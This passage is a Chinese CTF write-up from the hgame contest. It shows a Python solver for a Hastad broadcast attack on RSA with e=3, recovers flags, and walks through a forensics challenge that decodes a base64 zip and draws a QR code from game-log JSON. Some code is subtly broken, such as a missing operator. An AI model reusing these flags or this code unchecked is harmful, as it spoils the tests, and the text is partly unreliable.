c7 = 78140898568960172537532399957542065079754785608196175653725188831315142763849427144477433109881196560183622027227087954674199188991855929146336784979764720497547685824735751948676073196869027199411668951578490599507331800328072699193016348570092942269398714025948091737017548105562834031699831877517521836116912407428829037729994348603578694187241194587650053966682616443757430366693816438822541572320426819962696790047344705617241989403482962642561340363553100861232083902828830416053526478120239416765009622649261419311221132287115995483736302156498238644085182807103157307755108774079839474373171678479879270772376918459752331416572057373104068315516826270820079207687778179443170979119272546974948398836020966295976732842161084596604333609962435508857188202619164351406760248161996398928399808794165750688251550333360521545271424876496939865803880625334341137443221883906301968050670219384464251470416581899246708055363762134459566859899715206435140188997349196902765578570516978378759650864568014586614460583304460504318729333658817066272120984875742815218722200593432648242043375439670923950493477821363923796229165231700852653002648050645561521640741356788087870305958215222979881662007309583380284362915245390595921375463156

questions = []
questions.append({'n':n1,'c':c1})
questions.append({'n':n2,'c':c2})
questions.append({'n':n3,'c':c3})
questions.append({'n':n4,'c':c4})
questions.append({'n':n5,'c':c5})
questions.append({'n':n6,'c':c6})
questions.append({'n':n7,'c':c7})
e=3
for question in list(itertools.combinations(questions, 3)):
    # print(question)
    N = 1
    for i in range(len(question)):
        N*=question[i]['n']
    N_list = []
    for i in range(len(question)):
        N_list.append(N//question[i]['n'])
    t_list = []
    for i in range(len(question)):
        t_list.append(int(gmpy2.invert(N_list[i],question[i]['n'])))
    sum = 0
    for i in range(len(question)):
        sum = (sum question[i]['c']*t_list[i]*N_list[i])%N
    sum = gmpy2.iroot(sum,e)[0]
    # print(sum)
    try:
        word = libnum.n2s(int(sum)).decode()
        print(word)
    except:
        pass

缝合最后的flag:

hgame{!f y0u-pl4y_rem@ind3r~YOu^9ot=i7}

MISC

A R K

下载下来一个 Wireshark 的文件。打开分析,发现其中有上传 ssl.log 的记录.

右键 追踪流->TCP流

另存为 ssl.log

直接导出所有 HTTP 内容:

getBattleReplay 中有 base64 编码的内容

使用程序解码并保存

代码语言:javascript复制
import base64
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释 
* input = 'UEsFBhQAAAAIALdiS1Ki22GCdCgAABi BQANAAAAZGVmYXVsdF9lbnRyecSdTavTQBRA/0vcRp25dzIf7lRciIIi4kIRCTZqNE21SZ K N d5tYvdH/ARV /zmttpjfnMLxvzet /7Ef386P5unrs G4jIe5ueXbZh33w7LWG5tbjY9ecijOuaZt3h9Ox7mfmlvfmv2w9rt 7c X633nXX/cPZ76r0/rY5tbkuRGKSVJ1zZv /3wZFhO07o9 dJfDXanRpz4606uu/LU6y2N9d NrhOf4/MKOw77fpzH e3dw1IfWsofVz0c3wyPD Ncr9e2 TBO07C7Nw/7cVjunq/sUtvsx2X5 1rXNtNwNUz3dxV  /U6Xo1rve1m/3r1cdfd3G58dfnpla v PzS3g7b/f 6 qqfxt2D/2C/14d8OvX1AS/q /uuP96fl/X8 Fxv DDO54vb9a/E e7V7rR8uObrE677j9uvNZ mabvntP1YL71 d9zu9qre7XLDvBu 1Fdz fHh1VTfWHtpdunju34Ztjt8PKzDvI799KSfP2zXvOmvDsc7/bpOw2O7m9ZfbVxuL8u4rHfrb9bcWo n4fvL oyHt8v5hfz QBi1fmTG9XQczv/3p3n8dNreIfEhhazZd6298n9falPfnoM9yW48Dq9X 8Sdf8/l/GTHw f6o9THH6bzhe/fWwyuJDyQ8I6ERxKeSHgm4QWEiyPhnoSTK5yQK5yQK5yQK5yQK5yQK5yQK5yQK5ySK5ySK5ySK5ySh5qSh5qSh5qSh1ogD7VAHmqBPNQCOUwEcpjoUDg5yXTk8hrJ4zySx3kkj/OI/p TX6mR/EqN5FdqIg 1RB5qiTzUEvmVmshvtUR qyVyhUvkCpfIFS6RK1wmV7hMrnCZXOEyucJlcoXL5AqXiRVONzgU9QwORT2DQ1HP4FDUMzgU9QwORT2DQ1HP4FDUMzgU9QwORT2DQ1HP4FDUMzgU9QwORT2DQ1HP4FDUMzgU9QwORT2DQ1HP4FDUMzgU9QwORT2DQ1HP4FDUMzgU9QwORT1twainZNRTMuopGfWUjHpKRj0lo56SUU/JqKdk1FMy6ikZ9ZSMekpGPSWjnpJRT8mop2TUUzLqKRn1lIx6SkY9JaOeklFPyainZNRTMuopGfWUjHpKRj0lo14wOBP1DA5FPYNDUc/gUNQzOBT1DA5FPYNDUc/gUNQzOBT1DA5FPYNDUc/gUNQzOBT1DA5FPYNDUc/gUNQzOBT1DA5FPYNDUc/gUNQzOBT1DA5FPYNDUc/gUNQzOBT1DA5FvdCCUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUS QUa8zOBP1LnAm6hkcinoGhwykwSEDaXDIQBocMpAGhwykwSED RPekR 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 zwaseZoNXPfzB5Ql35Al35AknSr3ZYKk3myz1 geOSr2Co1Kv4KjUKzgq9QqOSr2Co1Kv4KjUKzgq9QqOSr2Co1Kv4KjUKzgq9QqOSr2Co1Kv4KjUKzgq9QqOSr2Co1Kv4KjUKzgq9QqOSr2Co1Kv4KjUKzgq9QqOSr2Co1Kv/8BSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSr8tSb3zgqNQrOCr1Co5KvYKjUq/gqNQrOCr1Co5KvYKjUq/gqNQrOCr1Co5KvYKjUq/gqNQrOCr1Co5KvYKjUq/gqNQrOCr1HtyUegVHpV7BUalXcFTqFRyVegVHpV7BUalXcFTqjR9Y6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6g1Z6s0PHDmZgiMnU3DkZAqOnEzBkZOZP9DJfOEhzvZfuHzmIZ 5uEh8TniR JzwIvE5pZOZ0slM6WSWHKlLjtQlR qSI3XJkbrkSF1ypC45UpccqUuO1CVH6pIjdcmRuuRIXXKkhhypIUdqyJEacqSGHKkhR2rIkRpypIYcqSFHasiRGnKkhhypIUdqyJGaHzjaby842m8vONpvf3CzevrgZvX0wc3q6S9cDJZfuPgx8QsX1VbK3 0pf7en/N1ecPPvwA9u/h34wc2/A//B5Vdtya/akl81EpdSxqWUcSnlonXKReuUi9ZfeMpnnvKZp3zmZNE65aJ1ykXrlIvWKRetUy5ap1y0TrlonXLROuXGb8qN35Qbvyk3flNu/Kbc E258Zty4zflxu/ wJH4LTgSvwVH4vfBjfh9cCN H9yI3wc34vfBjfh9cCN C47Eb8GR C04Er8FR K34Ej87h8ofrcUv1uK3y3F75bid0vxu6X43VL8bil txS/W4rfLcXvP bu5AhuGIaiYEJz4AIRYP6J2TWQJ4V2BO9CSlV9 EwJvynhNyX8poTflPCbEn5Twm9K E0JvynhNyX8poTflPCbEn5Twm9K E0JvynhNyX81jeO4LfjCH47juD3jRv4feMGft 4gd83buD3jRv4feMGft 4gd OI/jtOILfjiP47TiC3/pA C0JvyXhtyT8loTfkvBbEn5Lwm9J C0JvyXhtyT8loTfkvBbEn5Lwm9J C0JvyXhtyT8loTfkvBbEn5Lwm9J C0JvyXhtyT8loTfkvBbEn7vN45ekOw4ekGy4 gFyY6jpww7jp4y7Dh6yrDj6CnDjqOnDDuOnjLsOBLIjiOBvB8okFcK5JUCeaVAXklhV1LYlRR25UTblRNtV060XUlhV1LYlRR2JYVdSWFXUtiVFHYlhV1JYVdS2JUUdiGFxfjGDQ68cYMDf MOB2JAHIgBcSAGxIEYEAdiQByIAXEgBsSBGBAHYkAciAFxIAbEgRgQB2JAHIgBcSAGxIEYEAdiQByIAXEgBsSBGBAHYkAciAFxIAbEgRgQB2JAHIgBcSAGxIEYEAdiQByIIXFgfuMIBzqOcGB IA5MiQNT4sCUODAlDkyJA1PiwJQ4MCUOTIkDU LAlDgwJQ5MiQNT4sCUODAlDkyJA1PiwJQ4MCUOTIkDU LAlDgwJQ5MiQNT4sCUODAlDkyJA1PiwHrjU5z2X1yc9l9cnPZ/8SX ar 4uGq/uLhqb5zM PyLkxmff3Ey4/M37p4g/xt3T5D/jbsnyGNJHFgSB5bEgV9cfl5Dfl4f XkVezKx4J5MLLgnE0uazJIms6TJLPjgfiz44H4s OB LDjjEwvO MSCMz6xpEAuKZBLCuSSArmkQC4pkEsK5JICuaRA/uLyC5fyC5fyCydmfGLBGZ9YcMYn9jeO4LfjCH47juC34wh O47gt MIfjuO4LfjCH47juC34wh O47gt MIfjuO4LfjCH73B8LvlvC7JfxuCb9bwu W8Lsl/G4Jv1vC75bwuyX8bgm/W8LvlvC7JfxuCb9bwu W8Lsl/G4Jv1vC75bwuyX8bgm/W8LvlvC7JfxuCb9bwu W8Lsl/MY3juC34wh O47gt MIfjuO4LfjCH47juC34wh O47g940b O04gt OI/jtOILfjiP4jQ E35DwGxJ Q8JvSPgNCb8h4Tck/IaE35DwGxJ Q8JvSPgNCb8h4Tck/IaE35DwGxJ Q8JvSPgNCb8h4Tck/IaE35DwGxJ Q8JvSPgNCb8h4fd541P8WH5x8WP5F1/ix9JxBL8dR/DbcQS// JbXrUt/mq/uPirdRztQL5xswP5xs0O5Bs33v7Gjbd3HHn7I H3kfD7SPh9JPw En4fCb PhN9Hwu8j4feRAvlIgXykQD5SIB8pkI8UyEdS2CMp7JEU9kgKeySFPZLCHklhj6Sw53 gsJJXreRVK3HVzjeOBLLjSCA7jgSy40ggO44EsuNIIDuOBLLjSCA7jgSy40gg37gRyPOBAnmkQB4pkEcK5JECeaRAHimQRwrkkQJ5pEAeKZBHCuSRAnmkQB4pkEcK5JECeaRAHimQRwrkkQJ5pEAeKZBHCuSRAnmkQB4pkEcK5JECeaRAHimQ Y0jgew4EsiOI4HsOBLIjiOB7DgSyI4jgew4EsiOI4HsOBLIN24EMj9QIFMKZEqBTCmQKQUypUCmFMiUAplSIFMKZEqBTCmQKQUypUCmFMiUAplSIFMKZEqBTCmQKQUypUCmFMiUAplSIFMKZEqBTCmQKQUypUCmFMh640uc9l9cnPZfXJz2X1yc9l9cnPZfnJ528WPpOILfjiP47ThaPe04Wj3tOFo9/cXlVdvyqm151Yi3v3Hj7fWB3l7S20t6e0lvf Nm4/eNm43f sCN35LzmyXnN0vOb5aE35LwWxJ S8JvSfgtCb8l5zdLzm WnN8s6e0lvb2kt5eE35LwWxJ 7zeOBLLjSCA7jgSy40ggO44EsuNIIDuOBLLjSCA7jgSy40ggO44E8n6gQF4pkFcK5JUCeaVAXimQVwrklQJ5pUBeKZBXCuQf5u7oxo0YCIJoQv4YkjujZf6J2XDLdgjPERQEnKTtKtzoSgN5pYG80kBeaSCvNJBXGsgrDeSVBvJKA3mlgbzSQF5pIK80kFcayCsN5JUG8koDeaWBvNJAXmggu37DjYH8wo2B/MKNgfzCjYH8wo2B/MKNgfzCjYH8wo2B/MKNgfzCjYH8wo2B/AV3BrILGsguaCC7oIHsggayCxrILmggu6CB7IIGsgsayC5oILuggeyCBrILGsguaCC7oIHsggayCxrILmggu6CB7IIGsgsayC5oILuggeyCBrILGsguaCC7oIHsggayCxrILmkg1xe xCv/C6evXPy1B47Eb BI/AaOxG/gyEAGjgxk4MhABm7Ob37h5vzmF27Ob/aSBnJJA7mkgVzSQC5pIJc0kEuqsCVV2JIqbMGrp73g1dNe8OppL3j1tBe8etoLXj39B5cPEy0/4Vp woljs73gsdle8NhsL5k5lswcS2aOJX37kr59Sd  pG9f0rcv6duX9O1L vYlfftfuHyrfeRb7ZVvNZI5lswc63/IHOLGby9447cXvPHb zcc1aXAUV0KHNWlwFFdChzVpcBRXQoc1aXAUV0KHNWlwFFdChzVpcBRXQoc1aXAUV0KHNWlwFFdChzVpcBRXQoc1aXAUV0KHNWlwFFdChzVpf0D1qUt69KWdWnLurRlXdqyLm1Zl7asS1vWpS3r0pZ1acu6tGVd2rIubVmXtqxLW9alLevSlnVpy7q0ZV3asi5tWZe2rEtb1qUt69KWdWnLurRlXdqyLm1Zl85vOKpLgaO6FDiqS4GjuhQ4qkuBo7oUOKpLgaO6FDiqS4GjuhQ4qkuBo7oUOKpLgaO6FDiqS4GjuhQ4qkuBo7oUOKpLgaO6FDiqS4GjuhQ4qkvnB6xLR9alI vSkXXpyLp0ZF06si4dWZeOrEtH1qUj69KRdenIunRkXTqyLh1Zl46sS0fWpSPr0pF16ci6dGRdOrIuHVmXjqxLR9alI vSkXXpyLp0ZF06si49X/gSr/wvnL5y8RgVOKpLgaO6FDiqS4Gjn0QJHP0kSuDoJ1ECR1EvcBT1AkdRL3D0kyiBo59ECRz9JErgqC4FjupS4KguBY7qUuCoLgWO6tIjM8cjM8cjM8cjM8cjM8cjM8cjM8cjM8cjM8cjffsjffsjffsjffsjffsjffsjffsjffsjfftfuPxW 8hPuI/8hCO /ZG /ZG vX/DkfgNHInfwJH4DRyJ38CR A0cid/AkfgNHInfwJH4DRyJ38CR A0cid/AkfgNHInf/gHFb0vx21L8thS/LcVvS/HbUvy2FL8txW9L8dtS/LYUvy3Fb0vx21L8thS/LcVvS/HbUvy2FL8txW9L8dtS/LYUvy3Fb0vx21L8thS/LcVvS/HbUvzObzgSv4Ej8Rs4Er BI/EbOBK/gSPxGzgSv4Ej8Rs4Er BI/EbOBK/gSPxGzgSv4Ej8Ts/oPgdKX5Hit R4nek B0pfkeK35Hid6T4HSl R4rfkeJ3pPgdKX5Hit R4nek B0pfkeK35Hid6T4HSl R4rfkeJ3pPgdKX5Hit R4nek B0pfkeK389vOBK/gSPxGzgSv3/h4vv8L1x8n/ Bb/F9Hjjy7YEj3x448u2BI98eOPLtgSPfHjjy7YEj3x448u2Bo7P5gaOz YGjs/kfefX0I6 efuTV0488SPiRBwk/8iDhR17G 8jLeB95Ge Vc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc mVc nKuXTlXLpyLl05l66cS1fOpSvn0pVz6cq5dOVcunIuXTmXrpxLV86lK fSlXPpyrl05Vy6ci5dOZeunEtXzqUr59KVc nKuXTlXLpwLk3BuTQF59IUnEtT8Ll9Cj63T8Hn9in43D4Fn9un4HP7FHxun4LP7VPwuf0LN/ F/YWb/8L BXf/hT0F59IUnEtTcC79g8tPuCM/4Y78hBM3B6bgzYEpeHNgCt4cmII3B6bgzYF/cPlWe RbreVbTZx6mIKnHqbgqYcpeHNgCt4cmII3B6ag J2C4ncKit9/cPlWG/ncPvJhQlzYmIIXNqbghY0peGFjCl7YmIIXNn4Sd0e3dQMxFEQb8seSkpar/htL4PvyUsKpYGAYlskZiNoLXtjYC17Y2Ate2NgLRr29YNTbC0a9veCFjb3ghY294IWNvWBL3Qu21L1kS61fOGqpgaOWGjhqqYGjlho4aqmBo5YaOGqpgaOWGjhqqYGjlho4aqmBo5YaOGqpgaOWGjhqqYGjlho4aqmBo5YaOGqpgaOWGjhqqYGjlho4aqmBo5YaOGqpgaOWGjhqqYGjlho4aqn1A1tqyZZasqWWbKklW2rJllqypZZsqSVbasmWWrKllmypJVtqyZZasqWWbKklW2rJllqypZZsqSVbasmWWrKllmypJVtqyZZasqWWbKklW2rJllqypfYvHLXUwFFLDRy11MBRSw0ctdTAUUsNHLXUwFFLDRy11MBRSw0ctdTAUUsNHLXUwFFLDRy11MBRSw0ctdTAUUsNHLXUwFFLDRy11MBRSw0ctdTAUUsNHLXUwFFLDRy11MBRSw0ctdT gS21ZUtt2VJbttSWLbVlS23ZUlu21JYttWVLbdlSW7bUli21ZUtt2VJbttSWLbVlS23ZUlu21JYttWVLbdlSW7bUli21ZUtt2VJbttSWLbVlS23ZUq9fODKQgSMDGTgykP/gt/g7/8LF3/kXLv7OA0cqLHCkwq4fqMIuKQcuKQcuKQcuObdfcm6/5Nz hYth4guX/89H/j8n69Il16VLrkuXXJcuuS5dcl265dx y7n9lnP7Lef2W87tt5zbbzm333Juv Xcfsu5/ZZz y3n9lvO7bec2285t99ybr/l3H7Luf2Wc/st5/Zbzu23nNtvObffcm5/5Nz yLn9kXP7I f2R87tj5zbHzm3P3Juf Tc/si5/ZFz yPn9kfO7Y c2x85tz9ybn/k3P7Iuf2Rc/sj5/ZHzu2PnNsfObc/cm7fH3iJn/wLpz 5eLYHjk49BI5OPQSOTj184eLZ/oWLZ/s/eItne Dowkbg6MJG4OjCRuDowkbg6MJG4OjCRuDowkbg6MJG4OjCRuDowkbg6MJG4OjCxpbid0vxu6X4DRzdHAgc3RwIHN0c2FL8bil txS/W94c2PLmwJY3B7b07Vv69i19 5ZvYW/5FvaWb2FvmTm2zBxbZo4tX5Dc8gXJLV QnF84Er BI/EbOBK/gSPxGzgSv4Ej8Rs4Er BI/EbOBK/gSPxGzgSv4Ej8Rs4Er BI/E7P1D8jhS/I8XvSPE7UvyOFL8jxe9I8TtS/I4UvyPF70jxO1L8jhS/I8XvSPE7UvyOFL8jxe9I8TtS/I4UvyPF70jxO1L8jhS/I8XvSPE7UvyOFL8jxe/5hSPxGzgSv4Ej8Rs4Er BI/EbOBK/gSPxGzgSv4Ej8Rs4Er BI/EbOBK/gSPxGzgSv cHit8jxe R4vdI8Xuk D1S/B4pfo8Uv0eK3yPF75Hi90jxe6T4PVL8Hil jxS/R4rfI8XvkeL3SPF7pPg9UvweKX6PFL9Hit8jxe R4vdI8Xuk D1S/B4pft9fOBK/gSPxGzgSv6/cUl 5pb5yS/0Hf Tv/BEPmS9cPmTIZ2pf ZnaV36m9pVz yvn9lfO7a8cIF85QL5ygHzlZbxXXsZ75WW8V17Ge VlvFdexnvlZbxXXsZ75WW8V26pr9xSX7ilzoJb6iy4pc6CW osuKXOglvqLLilzoJb6iy4pc6CW osuKXOglvqLLilzoJb6iy4pc6CW osuKXOglvqLLilzoJb6iy4pc6CW osuKXOglvqLLilzoJb6iy4pc6CW osuKXOglvqLLmlltxSS26pJbfUkltqyS215JZackstuaWW3FJLbqklt9SSW2rJLbXkllpySy25pZbcUktuqSW31JJbasktteSWWnJLLbmlltxSS26pJbfUkltqyS215JbackttuaW23FIDNzcHPnBzc ADNzcHPnBzc ADNzcHPnBzc ADNzcHPnBzc Av3N0cmJYqrKUKa6nCAjcf3P/AzQf3P3Dzwf1paSBbGsiWBrKlgWxpIFsayJYGsqWBbGkgv3D5eN3yCbflE068/D4NX36fhi //4fLJ9zIJ9zIJxzJHC0zR8vM0TJztMwcLTNHy8zRMnO0zBwtfXtL397St1 /cOTbA0e PXDk2wNHvj1w5NsDR749cOTbA0e PXDk2wNHvj1w5Nv/EHcHR27DQBQFE9IBwAyBQf6J2cWxmUJH8A7aJYX VVDHkbd3HHl7x5G3dxx5e8eRt3cceXv8oLeH9PaQ3h7S20N6e0hvD ntIb09pLeH9PaQ3h7S20N6e0hvD ntIb09pLeH9PaQ3h7S20N6e0hvD ntIb09pLeH9PaQ3h7S20N6e0hvD nt caRt3cceXvHkbd3HHl7x5G3dxx5e8eRt3cceXvHkbd3HHl7x5G3dxx5e8eRt3cceXvHkbd3HHl7x5G35w96e0pvT ntKb09pben9PaU3p7S21N6e0pvT ntKb09pben9PaU3p7S21N6e0pvT ntKb09pben9PaU3p7S21N6e0pvT ntKb09pben9PaU3v68ceTtHUfe3nHk7R1H3t5x5O0dR97eceTtHUfe3nHk7R1H3t5x5O0dR97eceTtHUfe3nHk7V9cPl5TfuYpP3Myc3QczRzPD84cj5w5HjlzPHLmeKRAPlIgHymQj6SwR1LYIynskRT2SAp7JIU9ksIeSWGPpLD9xpHJdByZTMeRyXQcmUzHkcnsHzSZLU1mS5PZ0mS2NJktTWZLk9nSZLY0mS1NZkuT2dJktjSZLU1mS5PZ0mS2NJktTWZLk9nSZLY0mS1NZkuT2dJktjSZLU1mS5PZ0mS2NJktTWZLkzlvHJlMx5HJdByZTMeRyXQcmcz5QZM50mSONJkjTeZIkznSZI40mSNN5kiTOdJkjjSZI03mSJM50mSONJkjTeZIkznSZI40mSNN5kiTOdJkjjSZI03mSJM50mSONJkjTeZIkznSZI40mXrjyGQ6jkym48hkOo5MpuPIZOoHTaakyZQ0mZImU9JkSppMSZMpaTIlTaakyXxx pmL73BfXL7ViMmUNJmSJvM//sj/80d 5o/8zAmFlaSwkhRWksJKUlhJCitpMiVNpqTJlLxPpuR9MiXvk7lvHJlMx5HJdByZTMeRyXQcmcz9QZO50mSuNJkrTeZKk7nSZK40mStN5kqTudJkrjSZK03mSpO50mSuNJkrTeZKk7nSZK40mStN5kqTudJkrjSZK03mSpO50mSuNJkrTeZKk7nSZC40mRpv3JjMv7gxmX9xYzL/4sZk/sWNyfyNO5OpAU2mBjSZGtBkakCTqQFNpgY0mRrQZGpAk6kBTaYGNJka0GRqQJOpAU2mBjSZGtBkakCTqQFNpgY0mRrQZGpAk6kBTaYGNJka0GRqQJOpAU2mBjSZGtBkakCTqQFNpoY0mfnGkcl0HJlMx5HJTHlcmvK4NOVxacKrHmrCqx5qwqseasrj0pTHpSmPS19cfI364vJf7ZH/auSUOuUpdcpT6pSn1ClPqVOeUr 4ODR8cfmEe QTTvzgfk34g/s14Q/u15QmM6XJTGkyE/7gfk34g/s14Q/uf/GicflNpuTjlVDYlBQ2JYWtN44orOOIwjqOKKzjiMI6jiis44jCOo4orOOIwtYPUtiSFLYkhS1JYUtS2JIUtiSFLUlhS1LYkhS2JIUtSWFLUtiSFLYkhS1JYUtS2JIUtiSFLUlhS1LYkhS2JIUtSWFLUtiSFLYkhS1JYUtS2JIUtiSFxRtHFNZxRGEdRxTWcURhHUcU1nFEYR1HFNZxRGHxgxQWksJCUlhICgtJYSEpLCSFhaSwkBQWksJCUlhICgtJYSEpLCSFhaSwkBQWksJCUlhICgtJYSEpLCSFhaSwkBQWksJCUlhICgtJYSEpLCSF5RtHFNZxRGEdRxT2xcUf3Benf3Difd5xdFdYx9FdYR1Hd4V1HN0V1nF0V1jH0V1hHUd3hXUc3RXWcXRX2BeXT7gln3BLPuHIutRxtC51HK1LHUfrUsfRupQ/uC6lXJdSrksp16UvLt9qKd9qKd9qZNRLOeqlHPVSjnopR72Uo17KUS/lqJdy1Eu5LqVcl1KuSynXpZTrUsp16X/80Lh8pZZ8pZKZI XMkXLmeN44mjk6jmaOjqOZo No5ug4mjk6jmaOjqOZo No5ug4mjk6jmaOjqOZo No5ug4mjk6jmaOjqOZo No5ug4mjk6jmaOjqOZ409xdmzTQBQFUbQXxxshZvRFDWTEBEhsgGQWCXDo3m35FXHSCeYWcCaOmCMbZI5I5ohkjkjmiGSOSOaIZI5I5ohkjkjmiGSOSOaIZI5I5ohkjkjmiGSOSOaIZI5I5ohkjkjmiGSOSOaIZI5I5ohkjkjmiGSOSOaIZI4 4og5Jo6YY KIOSaOmGPiiDkmjphj4og5Jo6YY KIOSaOmGPiiDkmjphj4og5Jo6YY KIOSaOmGPiiDkmjphj4og5Jo6YoxtkjkrmqGSOSuaoZI5K5qhkjkrmqGSOSuaoZI5K5qhkjkrmqGSOSuaoZI5K5qhkjkrmqGSOSuaoZI5K5qhkjkrmqGSOSuaoZI5K5pj4MMf7dvr9OD5/vt/2/f7X1fW01vO6z5djf/36 z 9HJfz Xq9AVBLAQI/ABQAAAAIALdiS1Ki22GCdCgAABi BQANACQAAAAAAAAAIAAAAAAAAABkZWZhdWx0X2VudHJ5CgAgAAAAAAABABgAGc6HaC0A1wEZzodoLQDXAdynh2gtANcBUEsFBgAAAAABAAEAXwAAAJ8oAAAAAA=='
*/

result = base64.b64decode(input)

with open('./test','wb') as f:
    f.write(result)
print(result.decode('utf-8','ignore'))

查看文件 16 进制:

发现文件开头是 504B,zip文件的文件头是504B0304,把文件头修复之后用解压软件打开。

文件内容:

写个程序画出来

代码语言:javascript复制
import json
with open('./default_entry','r') as f:
    json = json.loads(f.read())

table = [[0 for j in range(78)]for i in range(75)]
for point in json['journal']['logs']:
    table[point['pos']['row']-12][point['pos']['col']-12] = 1

for row in range(75):
    for col in range(78):
        if table[row][col]:
            print('██',end='')
        else:
            print('  ',end='')
    print()

扫描结果:

hgame{Did_y0u_ge7_Dusk?}

Back to posts

游戏 html 文件存储 http

0 人点赞